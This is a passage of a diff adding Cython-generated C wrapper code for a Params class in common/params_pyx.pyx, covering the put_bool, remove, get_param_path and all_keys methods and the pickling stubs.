2)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + } + __pyx_v_key = values[0]; + __pyx_v_val = __Pyx_PyObject_IsTrue(values[1]); if (unlikely((__pyx_v_val == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 90, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("put_bool", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 90, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.params_pyx.Params.put_bool", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_10params_pyx_6Params_14put_bool(((struct __pyx_obj_6common_10params_pyx_Params *)__pyx_v_self), __pyx_v_key, __pyx_v_val); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_10params_pyx_6Params_14put_bool(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_key, bool __pyx_v_val) { + std::string __pyx_v_k; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + std::string __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("put_bool", 0); + + /* "common/params_pyx.pyx":91 + * + * def put_bool(self, key, bool val): + * cdef string k = self.check_key(key) # <<<<<<<<<<<<<< + * with nogil: + * self.p.putBool(k, val) + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_check_key); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 91, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_key}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 91, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_t_5 = __pyx_convert_string_from_py_std__in_string(__pyx_t_1); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 91, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_k = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_5); + + /* "common/params_pyx.pyx":92 + * def put_bool(self, key, bool val): + * cdef string k = self.check_key(key) + * with nogil: # <<<<<<<<<<<<<< + * self.p.putBool(k, val) + * + */ + { + #ifdef WITH_THREAD + PyThreadState *_save; + _save = NULL; + Py_UNBLOCK_THREADS + __Pyx_FastGIL_Remember(); + #endif + /*try:*/ { + + /* "common/params_pyx.pyx":93 + * cdef string k = self.check_key(key) + * with nogil: + * self.p.putBool(k, val) # <<<<<<<<<<<<<< + * + * def remove(self, key): + */ + (void)(__pyx_v_self->p->putBool(__pyx_v_k, __pyx_v_val)); + } + + /* "common/params_pyx.pyx":92 + * def put_bool(self, key, bool val): + * cdef string k = self.check_key(key) + * with nogil: # <<<<<<<<<<<<<< + * self.p.putBool(k, val) + * + */ + /*finally:*/ { + /*normal exit:*/{ + #ifdef WITH_THREAD + __Pyx_FastGIL_Forget(); + Py_BLOCK_THREADS + #endif + goto __pyx_L5; + } + __pyx_L5:; + } + } + + /* "common/params_pyx.pyx":90 + * self.p.put(k, dat_bytes) + * + * def put_bool(self, key, bool val): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * with nogil: + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("common.params_pyx.Params.put_bool", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":95 + * self.p.putBool(k, val) + * + * def remove(self, key): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * with nogil: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_6Params_17remove(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_6Params_17remove = {"remove", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_17remove, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_6Params_17remove(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_key = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("remove (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_key,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_key)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 95, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "remove") < 0)) __PYX_ERR(0, 95, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_key = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("remove", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 95, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.params_pyx.Params.remove", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_10params_pyx_6Params_16remove(((struct __pyx_obj_6common_10params_pyx_Params *)__pyx_v_self), __pyx_v_key); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_10params_pyx_6Params_16remove(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_key) { + std::string __pyx_v_k; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + std::string __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("remove", 0); + + /* "common/params_pyx.pyx":96 + * + * def remove(self, key): + * cdef string k = self.check_key(key) # <<<<<<<<<<<<<< + * with nogil: + * self.p.remove(k) + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_check_key); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 96, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_key}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 96, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_t_5 = __pyx_convert_string_from_py_std__in_string(__pyx_t_1); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 96, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_k = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_5); + + /* "common/params_pyx.pyx":97 + * def remove(self, key): + * cdef string k = self.check_key(key) + * with nogil: # <<<<<<<<<<<<<< + * self.p.remove(k) + * + */ + { + #ifdef WITH_THREAD + PyThreadState *_save; + _save = NULL; + Py_UNBLOCK_THREADS + __Pyx_FastGIL_Remember(); + #endif + /*try:*/ { + + /* "common/params_pyx.pyx":98 + * cdef string k = self.check_key(key) + * with nogil: + * self.p.remove(k) # <<<<<<<<<<<<<< + * + * def get_param_path(self, key=""): + */ + (void)(__pyx_v_self->p->remove(__pyx_v_k)); + } + + /* "common/params_pyx.pyx":97 + * def remove(self, key): + * cdef string k = self.check_key(key) + * with nogil: # <<<<<<<<<<<<<< + * self.p.remove(k) + * + */ + /*finally:*/ { + /*normal exit:*/{ + #ifdef WITH_THREAD + __Pyx_FastGIL_Forget(); + Py_BLOCK_THREADS + #endif + goto __pyx_L5; + } + __pyx_L5:; + } + } + + /* "common/params_pyx.pyx":95 + * self.p.putBool(k, val) + * + * def remove(self, key): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * with nogil: + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("common.params_pyx.Params.remove", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":100 + * self.p.remove(k) + * + * def get_param_path(self, key=""): # <<<<<<<<<<<<<< + * cdef string key_bytes = ensure_bytes(key) + * return self.p.getParamPath(key_bytes).decode("utf-8") + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_6Params_19get_param_path(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_6Params_19get_param_path = {"get_param_path", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_19get_param_path, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_6Params_19get_param_path(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_key = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get_param_path (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_key,0}; + PyObject* values[1] = {0}; + values[0] = ((PyObject *)__pyx_kp_u_); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_key); + if (value) { values[0] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 100, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "get_param_path") < 0)) __PYX_ERR(0, 100, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_key = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("get_param_path", 0, 0, 1, __pyx_nargs); __PYX_ERR(0, 100, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.params_pyx.Params.get_param_path", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_10params_pyx_6Params_18get_param_path(((struct __pyx_obj_6common_10params_pyx_Params *)__pyx_v_self), __pyx_v_key); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_10params_pyx_6Params_18get_param_path(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_key) { + std::string __pyx_v_key_bytes; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + std::string __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_param_path", 0); + + /* "common/params_pyx.pyx":101 + * + * def get_param_path(self, key=""): + * cdef string key_bytes = ensure_bytes(key) # <<<<<<<<<<<<<< + * return self.p.getParamPath(key_bytes).decode("utf-8") + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_ensure_bytes); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 101, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_key}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 101, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_t_5 = __pyx_convert_string_from_py_std__in_string(__pyx_t_1); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 101, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_key_bytes = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_5); + + /* "common/params_pyx.pyx":102 + * def get_param_path(self, key=""): + * cdef string key_bytes = ensure_bytes(key) + * return self.p.getParamPath(key_bytes).decode("utf-8") # <<<<<<<<<<<<<< + * + * def all_keys(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_decode_cpp_string(__pyx_v_self->p->getParamPath(__pyx_v_key_bytes), 0, PY_SSIZE_T_MAX, NULL, NULL, PyUnicode_DecodeUTF8); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 102, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "common/params_pyx.pyx":100 + * self.p.remove(k) + * + * def get_param_path(self, key=""): # <<<<<<<<<<<<<< + * cdef string key_bytes = ensure_bytes(key) + * return self.p.getParamPath(key_bytes).decode("utf-8") + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("common.params_pyx.Params.get_param_path", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":104 + * return self.p.getParamPath(key_bytes).decode("utf-8") + * + * def all_keys(self): # <<<<<<<<<<<<<< + * return self.p.allKeys() + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_6Params_21all_keys(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_6Params_21all_keys = {"all_keys", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_21all_keys, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_6Params_21all_keys(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("all_keys (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("all_keys", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "all_keys", 0))) return NULL; + __pyx_r = __pyx_pf_6common_10params_pyx_6Params_20all_keys(((struct __pyx_obj_6common_10params_pyx_Params *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_10params_pyx_6Params_20all_keys(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("all_keys", 0); + + /* "common/params_pyx.pyx":105 + * + * def all_keys(self): + * return self.p.allKeys() # <<<<<<<<<<<<<< + * + * def put_nonblocking(key, val, d=""): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __pyx_convert_vector_to_py_std_3a__3a_string(__pyx_v_self->p->allKeys()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 105, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "common/params_pyx.pyx":104 + * return self.p.getParamPath(key_bytes).decode("utf-8") + * + * def all_keys(self): # <<<<<<<<<<<<<< + * return self.p.allKeys() + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.params_pyx.Params.all_keys", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_6Params_23__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_6Params_23__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_23__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_6Params_23__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_6common_10params_pyx_6Params_22__reduce_cython__(((struct __pyx_obj_6common_10params_pyx_Params *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_10params_pyx_6Params_22__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("common.params_pyx.Params.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_6Params_25__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_6Params_25__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_25__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_6Params_25__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + 